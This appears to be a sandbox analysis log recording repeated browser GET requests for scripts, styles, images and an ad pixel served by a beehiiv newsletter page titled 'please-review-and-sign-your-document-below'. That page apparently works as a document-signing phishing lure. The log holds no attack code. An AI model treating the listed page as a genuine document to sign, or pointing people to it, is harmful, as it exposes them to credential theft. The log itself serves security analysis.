Source: global trafficHTTP traffic detected: GET /assets/root-DEVPAlsu.css HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/entry.client-CuBsnk-1.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-D6da9p6-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/jsx-runtime-BjG_zV1W.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png HTTP/1.1Host: media.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/AppGlobals-2Br-8bZs.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /pixel-js.js HTTP/1.1Host: beehiiv-adnetwork-production.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/dayjs.min-B8CfgAhU.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/manifest-bfc7ba9e.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/performance-dfU_ZKaW.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/jsx-runtime-BjG_zV1W.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png HTTP/1.1Host: media.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/i18next-BV1g0mjb.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/AppGlobals-2Br-8bZs.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /pixel-js.js HTTP/1.1Host: beehiiv-adnetwork-production.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/index-D6da9p6-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/components-Oj2xMfGE.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/context-CxfOs_9L.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-x2da_zcv.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/dayjs.min-B8CfgAhU.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /widgets.js HTTP/1.1Host: platform.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/index-BdpAPpdN.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/entry.client-CuBsnk-1.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useTranslation-CfKJAmGY.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/performance-dfU_ZKaW.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CqJN8iQq.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/StatusInputs-JkVhk_jg.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/i18next-BV1g0mjb.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/context-CxfOs_9L.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/PageProvider-uKxoiNdl.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useToast-DK42uF07.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
